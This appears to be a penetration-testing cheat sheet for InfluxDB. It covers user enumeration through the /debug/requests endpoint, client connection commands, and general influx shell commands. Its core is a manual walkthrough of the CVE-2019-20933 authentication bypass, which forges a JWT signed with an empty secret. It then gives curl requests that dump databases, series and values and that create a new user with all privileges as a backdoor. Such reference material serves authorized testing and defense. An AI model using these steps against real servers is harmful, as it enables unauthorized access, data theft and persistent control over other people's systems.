InfluxDB Pentesting
Last modified: 2023-02-05
InfluxDB is a time series database written in Go. A default port is 8086.
Enumeration
# User enumeration
curl http://<target-ip>:8086/debug/requests
Connect
influx -host 10.0.0.1 -port 8086
influx -host 10.0.0.1 -port 8086 -database <database>
influx -host 10.0.0.1 -port 8086 -username <username> -password <password>
# Import db file
influx -path example.db
Authentication Bypass (CVE-2019-20933) version ≤ 1.7.6
Automation
https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
Manual
Reference: https://www.komodosec.com/post/when-all-else-fails-find-a-0-day
Firse find the username.
curl http://<target-ip>:8086/debug/requests
Then create a JWT using the name we found in jwt.io.
Parameters are below:
Header:
{ “sub”: “123456789”, "alg": "HS256", "typ": "JWT" }
Payload:
{ "username": "**<username>**", "exp":21548669066 }
Verify Signature:
HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),<e**mpty>**)
Copy the generated JWT.
Now we can query the InfluxDB API.
INFLUXDB_JWT="<JWT>"
# List databases
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'q=SHOW DATABASES' | jq
# List seriest in the database
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SHOW SERIES' | jq
# Get values in the series
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SELECT * FROM <series>' | jq
# Create a privileged account
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode "q=CREATE USER tester with PASSWORD 'password' with ALL PRIVILEGES"
Commands
# Show command history
> history
# Show settings
> settings
# List databases
> show databases
# Show series information
> show series
# Show measurement information
> show measurements
# Show tag key information
> show tag keys
# Show field key information
> show field keys
# Switch to the database
> use <database>
# Query in the database
> select * from <series>